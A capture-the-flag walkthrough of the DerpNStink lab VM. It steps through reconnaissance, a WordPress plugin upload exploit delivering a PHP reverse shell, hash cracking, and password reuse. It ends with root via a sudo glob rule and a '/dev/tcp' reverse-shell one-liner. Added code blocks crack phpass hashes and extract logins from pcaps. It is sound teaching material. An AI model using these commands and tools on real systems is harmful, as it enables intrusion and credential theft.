Monday, October 14, 2019

VulnHub: DerpNStink Walkthrough

Let's start off with an nmap scan of the remote host.

root@ubuntu:~# nmap -sS -sV -sC -T5 -O 192.168.0.30

Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-13 21:25 MDT
Nmap scan report for derpnstink.local (192.168.0.30)
Host is up (0.0049s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.2
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA)
|   2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA)
|   256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA)
|_  256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (EdDSA)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 2 disallowed entries 
|_/php/ /temporary/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: DeRPnStiNK
MAC Address: 08:00:27:D1:5F:6A (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.71 seconds
root@ubuntu:~# 

The scan shows three open ports: 21 (vsftpd 3.0.2), 22 (OpenSSH 6.6.1p1) and 80 (Apache 2.4.7), and robots.txt already gives away two disallowed paths, /php/ and /temporary/. Let's navigate to the website and see what it looks like.

Next we run nikto against the host to see if it finds anything interesting.

root@ubuntu:~/src/nikto/program# ./nikto.pl -host 192.168.0.30
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.0.30
+ Target Hostname:    192.168.0.30
+ Target Port:        80
+ Start Time:         2019-10-13 21:27:56 (GMT-6)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/temporary/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.39). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 512, size: 55dcb6aaa2f50, mtime: gzip
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.22
+ OSVDB-3233: /icons/README: Apache default file found.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 7948 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2019-10-13 21:28:49 (GMT-6) (53 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@ubuntu:~/src/nikto/program# 

Nikto confirms that the '/temporary/' entry from robots.txt answers with 200 rather than 403. Requesting robots.txt directly gives:

User-agent: *
Disallow: /php/
Disallow: /temporary/

Checking both directories turns up nothing useful. Viewing the source of the main page, however, reveals an HTML comment: <!-- @stinky, make sure to update your hosts file with local dns so the new derpnstink blog can be reached before it goes live -->. The comment tells us the blog expects to be reached by hostname, so add an entry for derpnstink.local pointing at 192.168.0.30 to /etc/hosts before going further (the wpscan output later refers to the site by that name).

If we browse to the /webnotes/ directory we are greeted with the output of a user named 'stinky' running a whois query on the server. This gives us a username on the system: stinky.

I also ran dirb against the host to see what else it finds.

---- Scanning URL: http://192.168.0.30/ ----
==> DIRECTORY: http://192.168.0.30/css/
+ http://192.168.0.30/index.html (CODE:200|SIZE:1298)
==> DIRECTORY: http://192.168.0.30/javascript/
==> DIRECTORY: http://192.168.0.30/js/
==> DIRECTORY: http://192.168.0.30/php/
+ http://192.168.0.30/robots.txt (CODE:200|SIZE:53)
+ http://192.168.0.30/server-status (CODE:403|SIZE:292)
==> DIRECTORY: http://192.168.0.30/temporary/
==> DIRECTORY: http://192.168.0.30/weblog/
+ http://192.168.0.30/php/info.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.0.30/php/phpmyadmin/

dirb finds a WordPress installation at /weblog/ and a phpMyAdmin installation at /php/phpmyadmin/. Visiting both confirms their respective pages.

It's now time to run wpscan against /weblog/. Enumerating users and plugins and then brute-forcing the discovered users gives some promising results: the 'admin' account uses the password 'admin', and the site runs an out-of-date version of the slideshow-gallery plugin.

[+] admin
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] unclestinky
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[SUCCESS] - admin / admin                                                                                                                                
Trying unclestinky / seb Time: 00:07:48 <==========================================================               > (17884 / 22286) 80.24%  ETA: 00:01:55
[i] Valid Combinations Found:
 | Username: admin, Password: admin

[+] slideshow-gallery
 | Location: http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/
 | Last Updated: 2019-07-12T13:09:00.000Z
 | [!] The version is out of date, the latest version is 1.6.12

Our next task is to exploit the slideshow-gallery upload bug to get a shell on the box. The exploit script used here (wp_gallery_slideshow_146_suv.py) logs in with the credentials we brute-forced and uploads a file of our choosing; the payload is pentestmonkey's PHP reverse shell (php-reverse-shell.php). Before running it, edit the $ip and $port variables at the top of that file to point at the attacking host and the listener port (4444 below), and start the listener first so the connect-back is not missed.

python wp_gallery_slideshow_146_suv.py -t http://192.168.0.30/weblog/ -u admin -p admin -f php-reverse-shell.php

Once the exploit has run, requesting http://192.168.0.30/weblog/wp-content/uploads/slideshow-gallery/php-reverse-shell.php executes the upload and our listener receives the connect-back shell.

root@ubuntu:~# nc -l -p 4444
Linux DeRPnStiNK 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux
 09:01:52 up 1 day, 21:46,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$ 

Catting /etc/passwd shows two regular users, stinky and mrderp; stinky is the username we found earlier in the webnotes directory.

stinky:x:1001:1001:Uncle Stinky,,,:/home/stinky:/bin/bash
mrderp:x:1000:1000:Mr. Derp,,,:/home/mrderp:/bin/bash

The database login details are in wp-config.php under the WordPress document root: the site connects to MySQL as root with the password 'mysql'. With those we connect to the database and query the wp_users table for the password hashes. (The same credentials are worth trying against the phpMyAdmin instance found earlier at /php/phpmyadmin/.)

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'mysql');

|  1 | unclestinky | $P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41 |
|  2 | admin       | $P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/ |

We load up John the Ripper against the unclestinky hash and it cracks to 'wedgie57'. Since the WordPress user unclestinky and the system user stinky (gecos 'Uncle Stinky') look like the same person, we will try this password against the stinky account on the box.

$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:05 0.53% (ETA: 21:10:23) 0g/s 17618p/s 17618c/s 17618C/s austin101..861204
wedgie57         (?)
1g 0:00:02:31 DONE (2019-10-12 20:57) 0.006607g/s 18476p/s 18476c/s 18476C/s wedner10..wedder15
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed
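To make the John result above reproducible, and to show what the $P$ hash actually is, here is an added example (my own code, not from the walkthrough) that reimplements the phpass portable hash WordPress stores in wp_users: the character after $P$ encodes log2 of the iteration count ('B' gives 8192, matching John's cost line), the next 8 characters are the salt, and the remaining 22 characters are a custom base64 of the 16 MD5 bytes. The wordlist is a constructed stand-in for a real one.

```python
# Added example, not code from the walkthrough: a reimplementation of the phpass
# "portable" hash ($P$...) that WordPress stores in wp_users.user_pass.
import hashlib
import hmac
from typing import Iterable, Optional, Tuple

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Hash copied from the wp_users dump above (user unclestinky).
UNCLESTINKY_HASH = "$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41"

# Constructed stand-in for a real wordlist.
SAMPLE_WORDLIST = ["admin", "password", "derpnstink", "wedgie57", "stinky123"]


def _encode64(raw: bytes, count: int) -> str:
    """phpass's own base64 variant: 3 bytes -> 4 ITOA64 chars, low bits first."""
    out = []
    i = 0
    while i < count:
        value = raw[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= raw[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= raw[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def parse_setting(stored: str) -> Tuple[int, str]:
    """Split a $P$ hash into (iteration count, 8-char salt).

    Layout: '$P$' + count char + 8 salt chars + 22 chars of encoded digest = 34.
    The count char is an index into ITOA64 giving log2 of the round count.
    """
    if stored[:3] not in ("$P$", "$H$") or len(stored) != 34:
        raise ValueError("not a phpass portable hash")
    count_log2 = ITOA64.index(stored[3])
    if not 7 <= count_log2 <= 30:
        raise ValueError("iteration count out of range")
    return 1 << count_log2, stored[4:12]


def phpass_hash(password: str, stored: str) -> str:
    """Recompute the hash of `password` with the salt and round count from `stored`."""
    count, salt = parse_setting(stored)
    pw = password.encode()
    digest = hashlib.md5(salt.encode() + pw).digest()
    for _ in range(count):  # `count` further rounds of md5(previous digest || password)
        digest = hashlib.md5(digest + pw).digest()
    return stored[:12] + _encode64(digest, 16)


def check_password(password: str, stored: str) -> bool:
    """True if `password` reproduces `stored` (constant-time compare)."""
    return hmac.compare_digest(phpass_hash(password, stored), stored)


def crack(stored: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first candidate that reproduces `stored`, or None if none does."""
    for candidate in wordlist:
        if check_password(candidate, stored):
            return candidate
    return None


if __name__ == "__main__":
    rounds, salt = parse_setting(UNCLESTINKY_HASH)
    print(f"rounds={rounds} salt={salt}")
    print("cracked:", crack(UNCLESTINKY_HASH, SAMPLE_WORDLIST))
```

Every candidate costs 8193 MD5 calls, which is why John reports only ~18k candidates per second per thread here; that cost, not the algorithm's secrecy, is the only thing protecting a weak WordPress password once the database is readable.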

Having found the WordPress password for unclestinky, we try to su to stinky on the box with the same password, and it works.

www-data@DeRPnStiNK:/$ su stinky
su stinky
Password: wedgie57

stinky@DeRPnStiNK:/$ id
id
uid=1001(stinky) gid=1001(stinky) groups=1001(stinky)
stinky@DeRPnStiNK:/$ 

It worked! Now let's move into stinky's home directory and see what it has to offer. After browsing around a bit I find a flag on the Desktop.

stinky@DeRPnStiNK:~/Desktop$ cat flag.txt
cat flag.txt
flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)
stinky@DeRPnStiNK:~/Desktop$ 

Investigating further, there is a pcap file in ~/Documents that looks interesting. I downloaded it to my box and opened it in Wireshark.

Inside the capture we find a login for mrderp sent in the clear:

Password: derpderpderpderpderpderpderp
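Pulling credentials out of a capture by hand in Wireshark works for one pcap. As an added example (my own code, not part of the walkthrough, and not the VM's capture), here is a dependency-free pcap reader that scans every TCP segment for a cleartext HTTP form POST and reports the username and password fields. The capture it parses is constructed inline; the path /weblog/wp-login.php and the WordPress field names log/pwd are assumptions about the form, chosen because the site runs WordPress under /weblog/.

```python
# Added example, not code from the walkthrough: extract cleartext HTTP form
# logins from a classic pcap file without scapy or tshark.
import struct
from typing import Dict, Iterator, List, Tuple
from urllib.parse import parse_qs

USER_FIELDS = ("log", "username", "user", "email")   # WordPress posts log/pwd
PASS_FIELDS = ("pwd", "password", "pass")


def build_sample_pcap() -> bytes:
    """CONSTRUCTED capture: one Ethernet/IPv4/TCP segment carrying a wp-login POST."""
    body = b"log=mrderp&pwd=derpderpderpderpderpderpderp&wp-submit=Log+In"
    http = (b"POST /weblog/wp-login.php HTTP/1.1\r\n"
            b"Host: derpnstink.local\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\n"
            b"Content-Length: " + str(len(body)).encode() + b"\r\n\r\n" + body)
    # TCP header: sport, dport, seq, ack, data offset (5 words), flags PSH|ACK, win, csum, urg
    tcp = struct.pack("!HHIIBBHHH", 50000, 80, 1, 1, 5 << 4, 0x18, 8192, 0, 0) + http
    # IPv4 header: ver/ihl, tos, total len, id, flags/frag, ttl, proto=TCP, csum, src, dst
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0,
                     bytes([192, 168, 0, 42]), bytes([192, 168, 0, 30])) + tcp
    eth = b"\x08\x00\x27\xd1\x5f\x6a" + b"\x08\x00\x27\x00\x00\x01" + b"\x08\x00" + ip
    global_hdr = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)  # linktype 1 = Ethernet
    rec_hdr = struct.pack("<IIII", 1515536400, 0, len(eth), len(eth))
    return global_hdr + rec_hdr + eth


def tcp_payloads(pcap: bytes) -> Iterator[Tuple[str, str, bytes]]:
    """Yield (src_ip, dst_ip, payload) for every non-empty TCP segment in a classic pcap."""
    magic, = struct.unpack("<I", pcap[:4])
    if magic == 0xA1B2C3D4:
        endian = "<"
    elif magic == 0xD4C3B2A1:
        endian = ">"
    else:
        raise ValueError("not a classic pcap file (pcapng is not handled here)")
    linktype, = struct.unpack(endian + "I", pcap[20:24])
    if linktype != 1:
        raise ValueError("only Ethernet captures are handled")
    off = 24
    while off + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack(endian + "IIII", pcap[off:off + 16])
        frame = pcap[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":   # IPv4 ethertype only
            continue
        ihl = (frame[14] & 0x0F) * 4
        if frame[23] != 6:                                     # not TCP
            continue
        src = ".".join(map(str, frame[26:30]))
        dst = ".".join(map(str, frame[30:34]))
        tcp = frame[14 + ihl:]
        if len(tcp) < 20:
            continue
        data_off = (tcp[12] >> 4) * 4
        payload = tcp[data_off:]
        if payload:
            yield src, dst, payload


def extract_form_credentials(pcap: bytes) -> List[Dict[str, str]]:
    """Return one record per HTTP POST whose form body carries a user and password field."""
    found = []
    for src, dst, payload in tcp_payloads(pcap):
        if not payload.startswith(b"POST "):
            continue
        head, sep, body = payload.partition(b"\r\n\r\n")
        if not sep:
            continue
        path = head.split(b" ", 2)[1].decode(errors="replace")
        form = parse_qs(body.decode(errors="replace"))
        user = next((form[f][0] for f in USER_FIELDS if f in form), None)
        password = next((form[f][0] for f in PASS_FIELDS if f in form), None)
        if user and password:
            found.append({"src": src, "dst": dst, "path": path,
                          "user": user, "password": password})
    return found


if __name__ == "__main__":
    for hit in extract_form_credentials(build_sample_pcap()):
        print(hit)
```

The reader handles classic pcap only (not pcapng), IPv4 over Ethernet, and a POST whose headers and body arrive in a single segment; a body split across segments needs TCP stream reassembly, which is what Wireshark's Follow TCP Stream does for you. The same scan is a useful check from the defender's side: any hit means a login form is reachable over plain HTTP.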

We can try to su to mrderp from the current shell and see if the password is reused on the box.

stinky@DeRPnStiNK:~/Documents$ su mrderp
su mrderp
Password: derpderpderpderpderpderpderp

mrderp@DeRPnStiNK:/home/stinky/Documents$ id
id
uid=1000(mrderp) gid=1000(mrderp) groups=1000(mrderp)
mrderp@DeRPnStiNK:/home/stinky/Documents$ 

First we check mrderp's sudo permissions.

mrderp@DeRPnStiNK:/home/stinky/Documents$ sudo -l
sudo -l
[sudo] password for mrderp: derpderpderpderpderpderpderp

Matching Defaults entries for mrderp on DeRPnStiNK:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User mrderp may run the following commands on DeRPnStiNK:
    (ALL) /home/mrderp/binaries/derpy*
mrderp@DeRPnStiNK:/home/stinky/Documents$ 

sudo is allowed, but only for executables in /home/mrderp/binaries whose names start with derpy. That directory sits inside mrderp's own home and does not exist yet, so we can create it ourselves and drop in a derpy script of our own that spawns a root shell; sudo will run it as root because the rule says (ALL) and we know mrderp's password.
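The rule is dangerous for a specific, checkable reason: the command path carries a glob and lives under the invoking user's own home directory, so mrderp controls every file that can match it. As an added example (my own code, not from the walkthrough), this script parses sudo -l output and classifies each command spec so such rules stand out in a review; the sample text embeds the real mrderp rule from above plus two constructed entries to show the other verdicts.

```python
# Added example, not code from the walkthrough: classify the command specs in
# `sudo -l` output, flagging globbed paths under the invoking user's home.
import re
from typing import Dict, List

# Constructed sample: the real mrderp rule plus two made-up entries.
SAMPLE_SUDO_L = """\
Matching Defaults entries for mrderp on DeRPnStiNK:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User mrderp may run the following commands on DeRPnStiNK:
    (ALL) /home/mrderp/binaries/derpy*
    (root) NOPASSWD: /usr/bin/less /var/log/syslog
    (ALL) /usr/sbin/service apache2 *
"""

# "(runas) [TAG: ...] command [args]" -- only command-spec lines start with "(".
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z]+:\s*)*)(\S.*?)\s*$")
GLOB_CHARS = set("*?[")


def parse_rules(sudo_l_output: str) -> List[Dict[str, str]]:
    """Pull runas, tags and command out of each command-spec line of `sudo -l`."""
    rules = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if m:
            rules.append({"runas": m.group(1),
                          "tags": m.group(2).strip(),
                          "command": m.group(3)})
    return rules


def classify(rule: Dict[str, str], home: str) -> str:
    """Verdict for one rule given the home directory of the user it applies to."""
    path, _, args = rule["command"].partition(" ")
    home = home.rstrip("/") + "/"
    if GLOB_CHARS & set(path):
        if path.startswith(home):
            return "path-glob-under-home"   # user can create any file matching the glob
        return "path-glob"                   # depends on who can write the matching dir
    if GLOB_CHARS & set(args):
        return "arg-glob"                    # wildcard in args: exploitability depends on the binary
    return "fixed"


def risky_rules(sudo_l_output: str, home: str) -> List[str]:
    """Return 'verdict: command' for every rule that is not a fixed path with fixed args."""
    out = []
    for rule in parse_rules(sudo_l_output):
        verdict = classify(rule, home)
        if verdict != "fixed":
            out.append(f"{verdict}: {rule['command']}")
    return out


if __name__ == "__main__":
    for line in risky_rules(SAMPLE_SUDO_L, "/home/mrderp"):
        print(line)
```

A path-glob-under-home verdict is game over, as shown next. arg-glob is not automatically exploitable; it depends on what the binary does with the extra argument. The fix for the mrderp rule is to point it at a fixed, root-owned path the user cannot write to, with no wildcard in the filename.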

mrderp@DeRPnStiNK:~$ mkdir ~/binaries && cd ~/binaries
mrderp@DeRPnStiNK:~/binaries$ echo '#!/bin/bash' >> derpy.sh
mrderp@DeRPnStiNK:~/binaries$ echo 'bash -i >& /dev/tcp/192.168.0.42/444 0>&1' >> derpy.sh
mrderp@DeRPnStiNK:~/binaries$ chmod +x derpy.sh
mrderp@DeRPnStiNK:~/binaries$ sudo ./derpy.sh

Once the script runs under sudo, we check the listener we started on port 444 on our host for the connect-back; the shell that arrives is root.

root@DeRPnStiNK:~/binaries# id
id
uid=0(root) gid=0(root) groups=0(root)
root@DeRPnStiNK:~/binaries# whoami
whoami
root
root@DeRPnStiNK:~/binaries#

We got root! Now let's find the final flag of the challenge.

root@DeRPnStiNK:/root/Desktop# ls -l
ls -l
total 4
-rw-r--r-- 1 root root 180 Jan  9  2018 flag.txt
root@DeRPnStiNK:/root/Desktop# cat flag.txt
cat flag.txt
flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)

Congrats on rooting my first VulnOS!

Hit me up on twitter and let me know your thoughts!

@securekomodo

root@DeRPnStiNK:/root/Desktop#
And that's all there is to it.
